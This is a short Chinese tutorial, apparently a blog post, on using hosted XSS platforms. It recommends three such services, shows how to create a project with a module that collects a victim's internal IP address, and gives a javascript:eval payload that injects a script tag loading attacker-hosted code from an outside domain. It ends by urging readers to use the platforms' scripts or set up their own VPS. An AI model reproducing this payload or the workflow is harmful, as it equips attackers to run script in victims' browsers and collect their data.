我接触使用过三个XSS平台
1.脚本非常丰富：http://www.1oad.com
2.简约：https://xsspt.com
3.非常好用，自带模块成功获取到了内网ip(上面两个都没有成功)：https://xsshs.cn
所以我这个文章也是简单的说说如何使用XSS平台，以第三个平台为例说明；

一、注册用户并登录

二、创建项目

1.创建项目，创建完后会生成一个xss可用脚本地址

项目名称随意，项目描述随意；但是创建之后就不能更改了。

2.有很多可用的模块，我们这次要构建一个获取计算机内网ip地址的xss脚本，所以勾选获取内网ip模块；

这里也选择上
点击下一步就创建成功一个项目，如下：

上图中“xsshs.cn/JI9q” 就是本次构建攻击脚本，其中 JI9q就是id；

三、如何使用

(本次测试方法为自己本地测试----就是自己攻击自己，假设已经成功xss，然后查看xss的效果)
打开任意网站例如百度，如后输入

javascript:eval('window.s=document.createElement("script");window.s.src="//xsshs.cn/JI9q";document.body.appendChild(window.s)')
注意：其中src换成你自己的攻击脚本即可,然后回车

此时返回xss平台：

以上XSS平台 测试演示成功；

一定要多多利用平台上面各种脚本，那个才是根本，然后自己买一个VPS，不用这个平台也是可以的。